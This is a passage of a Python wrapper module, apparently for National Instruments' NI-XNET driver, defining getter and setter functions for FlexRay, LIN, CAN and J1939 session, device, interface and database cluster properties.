_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_STATISTICS_EN,
)
def set_session_intf_flex_ray_statistics_en(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_STATISTICS_EN,
value,
)
def get_session_intf_flex_ray_sym_to_in_strm(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_SYM_TO_IN_STRM,
)
def set_session_intf_flex_ray_sym_to_in_strm(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_SYM_TO_IN_STRM,
value,
)
def get_session_intf_flex_ray_sync_ch_a_even(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_session_u32_array(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_SYNC_CH_A_EVEN,
)
def get_session_intf_flex_ray_sync_ch_a_odd(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_session_u32_array(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_SYNC_CH_A_ODD,
)
def get_session_intf_flex_ray_sync_ch_b_even(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_session_u32_array(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_SYNC_CH_B_EVEN,
)
def get_session_intf_flex_ray_sync_ch_b_odd(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_session_u32_array(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_SYNC_CH_B_ODD,
)
def get_session_intf_flex_ray_sync_status(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_SYNC_STATUS,
)
def get_session_intf_flex_ray_term(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_TERM,
)
def set_session_intf_flex_ray_term(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_TERM,
value,
)
def get_session_intf_flex_ray_wakeup_ch(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_WAKEUP_CH,
)
def set_session_intf_flex_ray_wakeup_ch(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_WAKEUP_CH,
value,
)
def get_session_intf_flex_ray_wakeup_ptrn(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_WAKEUP_PTRN,
)
def set_session_intf_flex_ray_wakeup_ptrn(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_WAKEUP_PTRN,
value,
)
def set_session_intf_flex_ray_sleep(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_SLEEP,
value,
)
def get_session_intf_flex_ray_connected_chs(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_CONNECTED_CHS,
)
def set_session_intf_flex_ray_connected_chs(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_CONNECTED_CHS,
value,
)
def get_session_intf_lin_break_length(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_LIN_BREAK_LENGTH,
)
def set_session_intf_lin_break_length(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_LIN_BREAK_LENGTH,
value,
)
def get_session_intf_lin_master(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_LIN_MASTER,
)
def set_session_intf_lin_master(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_LIN_MASTER,
value,
)
def get_session_intf_lin_sched_names(
ref, # type: int
):
# type: (...) -> typing.Iterable[typing.Text]
return _cprops.get_session_string_array(
ref,
_cconsts.NX_PROP_SESSION_INTF_LIN_SCHED_NAMES,
)
def set_session_intf_lin_sleep(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_LIN_SLEEP,
value,
)
def get_session_intf_lin_term(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_LIN_TERM,
)
def set_session_intf_lin_term(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_LIN_TERM,
value,
)
def get_session_intf_lin_diag_p2min(
ref, # type: int
):
# type: (...) -> float
return _cprops.get_session_f64(
ref,
_cconsts.NX_PROP_SESSION_INTF_LIN_DIAG_P_2MIN,
)
def set_session_intf_lin_diag_p2min(
ref, # type: int
value, # type: float
):
# type: (...) -> None
_cprops.set_session_f64(
ref,
_cconsts.NX_PROP_SESSION_INTF_LIN_DIAG_P_2MIN,
value,
)
def get_session_intf_lin_diag_stmin(
ref, # type: int
):
# type: (...) -> float
return _cprops.get_session_f64(
ref,
_cconsts.NX_PROP_SESSION_INTF_LIN_DIAG_S_TMIN,
)
def set_session_intf_lin_diag_stmin(
ref, # type: int
value, # type: float
):
# type: (...) -> None
_cprops.set_session_f64(
ref,
_cconsts.NX_PROP_SESSION_INTF_LIN_DIAG_S_TMIN,
value,
)
def get_session_intf_lin_alw_start_wo_bus_pwr(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_LIN_ALW_START_WO_BUS_PWR,
)
def set_session_intf_lin_alw_start_wo_bus_pwr(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_LIN_ALW_START_WO_BUS_PWR,
value,
)
def get_session_intf_lin_ostr_slv_rsp_lst_by_nad(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_session_u32_array(
ref,
_cconsts.NX_PROP_SESSION_INTF_LINO_STR_SLV_RSP_LST_BY_NAD,
)
def set_session_intf_lin_ostr_slv_rsp_lst_by_nad(
ref, # type: int
value, # type: typing.List[int]
):
# type: (...) -> None
_cprops.set_session_u32_array(
ref,
_cconsts.NX_PROP_SESSION_INTF_LINO_STR_SLV_RSP_LST_BY_NAD,
value,
)
def get_session_intf_lin_no_response_to_in_strm(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_LIN_NO_RESPONSE_TO_IN_STRM,
)
def set_session_intf_lin_no_response_to_in_strm(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_LIN_NO_RESPONSE_TO_IN_STRM,
value,
)
def get_session_intf_lin_checksum_to_in_strm(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_LIN_CHECKSUM_TO_IN_STRM,
)
def set_session_intf_lin_checksum_to_in_strm(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_LIN_CHECKSUM_TO_IN_STRM,
value,
)
def get_session_intf_src_term_start_trigger(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_session_string(
ref,
_cconsts.NX_PROP_SESSION_INTF_SRC_TERM_START_TRIGGER,
)
def set_session_intf_src_term_start_trigger(
ref, # type: int
value, # type: typing.Text
):
# type: (...) -> None
_cprops.set_session_string(
ref,
_cconsts.NX_PROP_SESSION_INTF_SRC_TERM_START_TRIGGER,
value,
)
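# Usage sketch (illustrative only; assumes `ref` is a valid session handle
# obtained from the session-creation wrapper elsewhere in this package):
#
#     set_session_intf_lin_master(ref, True)   # configure interface as LIN master
#     is_master = get_session_intf_lin_master(ref)
#
# Each get_/set_ pair above delegates to the _cprops accessor matching the
# property's underlying C data type (bool, u32, u64, f64, string, or array).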
def get_session_j1939_address(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_J1939_ADDRESS,
)
def set_session_j1939_address(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_J1939_ADDRESS,
value,
)
def get_session_j1939_name(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u64(
ref,
_cconsts.NX_PROP_SESSION_J1939_NAME,
)
def set_session_j1939_name(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u64(
ref,
_cconsts.NX_PROP_SESSION_J1939_NAME,
value,
)
def set_session_j1939_ecu(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_ref(
ref,
_cconsts.NX_PROP_SESSION_J1939_ECU,
value,
)
def get_session_j1939_timeout_t1(
ref, # type: int
):
# type: (...) -> float
return _cprops.get_session_f64(
ref,
_cconsts.NX_PROP_SESSION_J1939_TIMEOUT_T1,
)
def set_session_j1939_timeout_t1(
ref, # type: int
value, # type: float
):
# type: (...) -> None
_cprops.set_session_f64(
ref,
_cconsts.NX_PROP_SESSION_J1939_TIMEOUT_T1,
value,
)
def get_session_j1939_timeout_t2(
ref, # type: int
):
# type: (...) -> float
return _cprops.get_session_f64(
ref,
_cconsts.NX_PROP_SESSION_J1939_TIMEOUT_T2,
)
def set_session_j1939_timeout_t2(
ref, # type: int
value, # type: float
):
# type: (...) -> None
_cprops.set_session_f64(
ref,
_cconsts.NX_PROP_SESSION_J1939_TIMEOUT_T2,
value,
)
def get_session_j1939_timeout_t3(
ref, # type: int
):
# type: (...) -> float
return _cprops.get_session_f64(
ref,
_cconsts.NX_PROP_SESSION_J1939_TIMEOUT_T3,
)
def set_session_j1939_timeout_t3(
ref, # type: int
value, # type: float
):
# type: (...) -> None
_cprops.set_session_f64(
ref,
_cconsts.NX_PROP_SESSION_J1939_TIMEOUT_T3,
value,
)
def get_session_j1939_timeout_t4(
ref, # type: int
):
# type: (...) -> float
return _cprops.get_session_f64(
ref,
_cconsts.NX_PROP_SESSION_J1939_TIMEOUT_T4,
)
def set_session_j1939_timeout_t4(
ref, # type: int
value, # type: float
):
# type: (...) -> None
_cprops.set_session_f64(
ref,
_cconsts.NX_PROP_SESSION_J1939_TIMEOUT_T4,
value,
)
def get_session_j1939_response_time_tr_sd(
ref, # type: int
):
# type: (...) -> float
return _cprops.get_session_f64(
ref,
_cconsts.NX_PROP_SESSION_J1939_RESPONSE_TIME_TR_SD,
)
def set_session_j1939_response_time_tr_sd(
ref, # type: int
value, # type: float
):
# type: (...) -> None
_cprops.set_session_f64(
ref,
_cconsts.NX_PROP_SESSION_J1939_RESPONSE_TIME_TR_SD,
value,
)
def get_session_j1939_response_time_tr_gd(
ref, # type: int
):
# type: (...) -> float
return _cprops.get_session_f64(
ref,
_cconsts.NX_PROP_SESSION_J1939_RESPONSE_TIME_TR_GD,
)
def set_session_j1939_response_time_tr_gd(
ref, # type: int
value, # type: float
):
# type: (...) -> None
_cprops.set_session_f64(
ref,
_cconsts.NX_PROP_SESSION_J1939_RESPONSE_TIME_TR_GD,
value,
)
def get_session_j1939_hold_time_th(
ref, # type: int
):
# type: (...) -> float
return _cprops.get_session_f64(
ref,
_cconsts.NX_PROP_SESSION_J1939_HOLD_TIME_TH,
)
def set_session_j1939_hold_time_th(
ref, # type: int
value, # type: float
):
# type: (...) -> None
_cprops.set_session_f64(
ref,
_cconsts.NX_PROP_SESSION_J1939_HOLD_TIME_TH,
value,
)
def get_session_j1939_num_packets_recv(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_J1939_NUM_PACKETS_RECV,
)
def set_session_j1939_num_packets_recv(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_J1939_NUM_PACKETS_RECV,
value,
)
def get_session_j1939_num_packets_resp(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_J1939_NUM_PACKETS_RESP,
)
def set_session_j1939_num_packets_resp(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_J1939_NUM_PACKETS_RESP,
value,
)
def get_session_j1939_max_repeat_cts(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_J1939_MAX_REPEAT_CTS,
)
def set_session_j1939_max_repeat_cts(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_J1939_MAX_REPEAT_CTS,
value,
)
def get_session_j1939_fill_byte(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_J1939_FILL_BYTE,
)
def set_session_j1939_fill_byte(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_J1939_FILL_BYTE,
value,
)
def get_session_j1939_write_queue_size(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_J1939_WRITE_QUEUE_SIZE,
)
def set_session_j1939_write_queue_size(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_J1939_WRITE_QUEUE_SIZE,
value,
)
def get_session_j1939_ecu_busy(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_session_bool(
ref,
_cconsts.NX_PROP_SESSION_J1939_ECU_BUSY,
)
def set_session_j1939_ecu_busy(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_session_bool(
ref,
_cconsts.NX_PROP_SESSION_J1939_ECU_BUSY,
value,
)
def get_session_j1939_include_dest_addr_in_pgn(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_session_bool(
ref,
_cconsts.NX_PROP_SESSION_J1939_INCLUDE_DEST_ADDR_IN_PGN,
)
def set_session_j1939_include_dest_addr_in_pgn(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_session_bool(
ref,
_cconsts.NX_PROP_SESSION_J1939_INCLUDE_DEST_ADDR_IN_PGN,
value,
)
def get_session_intf_can_edge_filter(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_EDGE_FILTER,
)
def set_session_intf_can_edge_filter(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_EDGE_FILTER,
value,
)
def get_session_intf_can_transmit_pause(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_TRANSMIT_PAUSE,
)
def set_session_intf_can_transmit_pause(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_TRANSMIT_PAUSE,
value,
)
def get_session_intf_can_disable_prot_exception_handling(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_DISABLE_PROT_EXCEPTION_HANDLING,
)
def set_session_intf_can_disable_prot_exception_handling(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_DISABLE_PROT_EXCEPTION_HANDLING,
value,
)
def set_session_can_start_time_off(
ref, # type: int
sub, # type: int
value, # type: float
):
# type: (...) -> None
_cprops.set_session_sub_f64(
ref,
sub,
_cconsts.NX_PROP_SESSION_SUB_CAN_START_TIME_OFF,
value,
)
def set_session_can_tx_time(
ref, # type: int
sub, # type: int
value, # type: float
):
# type: (...) -> None
_cprops.set_session_sub_f64(
ref,
sub,
_cconsts.NX_PROP_SESSION_SUB_CAN_TX_TIME,
value,
)
def set_session_skip_n_cyclic_frames(
ref, # type: int
sub, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_sub_u32(
ref,
sub,
_cconsts.NX_PROP_SESSION_SUB_SKIP_N_CYCLIC_FRAMES,
value,
)
def set_session_lin_tx_n_corrupted_chksums(
ref, # type: int
sub, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_sub_u32(
ref,
sub,
_cconsts.NX_PROP_SESSION_SUB_LIN_TX_N_CORRUPTED_CHKSUMS,
value,
)
def set_session_j1939_addr_filter(
ref, # type: int
sub, # type: int
value, # type: typing.Text
):
# type: (...) -> None
_cprops.set_session_sub_string(
ref,
sub,
_cconsts.NX_PROP_SESSION_SUB_J1939_ADDR_FILTER,
value,
)
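# Note: the setters above take an additional `sub` argument -- a subordinate
# (e.g. frame) reference within the session -- so the property is applied per
# frame rather than session-wide. Illustrative sketch with hypothetical refs:
#
#     set_session_can_tx_time(ref, frame_ref, 0.010)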
def get_system_dev_refs(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_session_ref_array(
ref,
_cconsts.NX_PROP_SYS_DEV_REFS,
)
def get_system_intf_refs(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_session_ref_array(
ref,
_cconsts.NX_PROP_SYS_INTF_REFS,
)
def get_system_intf_refs_can(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_session_ref_array(
ref,
_cconsts.NX_PROP_SYS_INTF_REFS_CAN,
)
def get_system_intf_refs_flex_ray(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_session_ref_array(
ref,
_cconsts.NX_PROP_SYS_INTF_REFS_FLEX_RAY,
)
def get_system_intf_refs_lin(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_session_ref_array(
ref,
_cconsts.NX_PROP_SYS_INTF_REFS_LIN,
)
def get_system_ver_build(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SYS_VER_BUILD,
)
def get_system_ver_major(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SYS_VER_MAJOR,
)
def get_system_ver_minor(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SYS_VER_MINOR,
)
def get_system_ver_phase(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SYS_VER_PHASE,
)
def get_system_ver_update(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SYS_VER_UPDATE,
)
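# Example (illustrative only; `sys_ref` is assumed to be an open system ref):
#
#     version = '{}.{}.{} build {}'.format(
#         get_system_ver_major(sys_ref),
#         get_system_ver_minor(sys_ref),
#         get_system_ver_update(sys_ref),
#         get_system_ver_build(sys_ref),
#     )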
def get_system_intf_refs_all(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_session_ref_array(
ref,
_cconsts.NX_PROP_SYS_INTF_REFS_ALL,
)
def get_device_form_fac(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_DEV_FORM_FAC,
)
def get_device_intf_refs(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_session_ref_array(
ref,
_cconsts.NX_PROP_DEV_INTF_REFS,
)
def get_device_name(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_session_string(
ref,
_cconsts.NX_PROP_DEV_NAME,
)
def get_device_num_ports(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_DEV_NUM_PORTS,
)
def get_device_product_num(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_DEV_PRODUCT_NUM,
)
def get_device_ser_num(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_DEV_SER_NUM,
)
def get_device_slot_num(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_DEV_SLOT_NUM,
)
def get_device_num_ports_all(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_DEV_NUM_PORTS_ALL,
)
def get_device_intf_refs_all(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_session_ref_array(
ref,
_cconsts.NX_PROP_DEV_INTF_REFS_ALL,
)
def get_interface_dev_ref(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_ref(
ref,
_cconsts.NX_PROP_INTF_DEV_REF,
)
def get_interface_name(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_session_string(
ref,
_cconsts.NX_PROP_INTF_NAME,
)
def get_interface_num(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_INTF_NUM,
)
def get_interface_port_num(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_INTF_PORT_NUM,
)
def get_interface_protocol(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_INTF_PROTOCOL,
)
def get_interface_can_term_cap(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_INTF_CAN_TERM_CAP,
)
def get_interface_can_tcvr_cap(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_INTF_CAN_TCVR_CAP,
)
def get_interface_dongle_state(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_INTF_DONGLE_STATE,
)
def get_interface_dongle_id(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_INTF_DONGLE_ID,
)
def get_interface_dongle_revision(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_INTF_DONGLE_REVISION,
)
def get_interface_dongle_firmware_version(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_INTF_DONGLE_FIRMWARE_VERSION,
)
def get_interface_dongle_compatible_revision(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_INTF_DONGLE_COMPATIBLE_REVISION,
)
def get_interface_dongle_compatible_firmware_version(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_INTF_DONGLE_COMPATIBLE_FIRMWARE_VERSION,
)
def get_database_name(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_database_string(
ref,
_cconsts.NX_PROP_DATABASE_NAME,
)
def get_database_clst_refs(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_ref_array(
ref,
_cconsts.NX_PROP_DATABASE_CLST_REFS,
)
def get_database_show_invalid_from_open(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_database_bool(
ref,
_cconsts.NX_PROP_DATABASE_SHOW_INVALID_FROM_OPEN,
)
def set_database_show_invalid_from_open(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_database_bool(
ref,
_cconsts.NX_PROP_DATABASE_SHOW_INVALID_FROM_OPEN,
value,
)
def get_cluster_baud_rate(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_BAUD_RATE,
)
def set_cluster_baud_rate(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_BAUD_RATE,
value,
)
def get_cluster_baud_rate64(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u64(
ref,
_cconsts.NX_PROP_CLST_BAUD_RATE64,
)
def set_cluster_baud_rate64(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u64(
ref,
_cconsts.NX_PROP_CLST_BAUD_RATE64,
value,
)
def get_cluster_comment(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_database_string(
ref,
_cconsts.NX_PROP_CLST_COMMENT,
)
def set_cluster_comment(
ref, # type: int
value, # type: typing.Text
):
# type: (...) -> None
_cprops.set_database_string(
ref,
_cconsts.NX_PROP_CLST_COMMENT,
value,
)
def get_cluster_config_status(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_CONFIG_STATUS,
)
def get_cluster_database_ref(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_ref(
ref,
_cconsts.NX_PROP_CLST_DATABASE_REF,
)
def get_cluster_ecu_refs(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_ref_array(
ref,
_cconsts.NX_PROP_CLST_ECU_REFS,
)
def get_cluster_frm_refs(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_ref_array(
ref,
_cconsts.NX_PROP_CLST_FRM_REFS,
)
def get_cluster_name(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_database_string(
ref,
_cconsts.NX_PROP_CLST_NAME,
)
def set_cluster_name(
ref, # type: int
value, # type: typing.Text
):
# type: (...) -> None
_cprops.set_database_string(
ref,
_cconsts.NX_PROP_CLST_NAME,
value,
)
def get_cluster_pdu_refs(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_ref_array(
ref,
_cconsts.NX_PROP_CLST_PDU_REFS,
)
def get_cluster_pdus_reqd(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_database_bool(
ref,
_cconsts.NX_PROP_CLST_PDUS_REQD,
)
def get_cluster_protocol(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_PROTOCOL,
)
def set_cluster_protocol(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_PROTOCOL,
value,
)
def get_cluster_sig_refs(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_ref_array(
ref,
_cconsts.NX_PROP_CLST_SIG_REFS,
)
def get_cluster_can_io_mode(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_CAN_IO_MODE,
)
def set_cluster_can_io_mode(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_CAN_IO_MODE,
value,
)
def get_cluster_can_fd_baud_rate(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_CAN_FD_BAUD_RATE,
)
def set_cluster_can_fd_baud_rate(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_CAN_FD_BAUD_RATE,
value,
)
def get_cluster_can_fd_baud_rate64(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u64(
ref,
_cconsts.NX_PROP_CLST_CAN_FD_BAUD_RATE64,
)
def set_cluster_can_fd_baud_rate64(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u64(
ref,
_cconsts.NX_PROP_CLST_CAN_FD_BAUD_RATE64,
value,
)
def get_cluster_flex_ray_act_pt_off(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_ACT_PT_OFF,
)
def set_cluster_flex_ray_act_pt_off(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_ACT_PT_OFF,
value,
)
def get_cluster_flex_ray_cas_rx_l_max(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_CAS_RX_L_MAX,
)
def set_cluster_flex_ray_cas_rx_l_max(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_CAS_RX_L_MAX,
value,
)
def get_cluster_flex_ray_channels(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_CHANNELS,
)
def set_cluster_flex_ray_channels(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_CHANNELS,
value,
)
def get_cluster_flex_ray_clst_drift_dmp(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
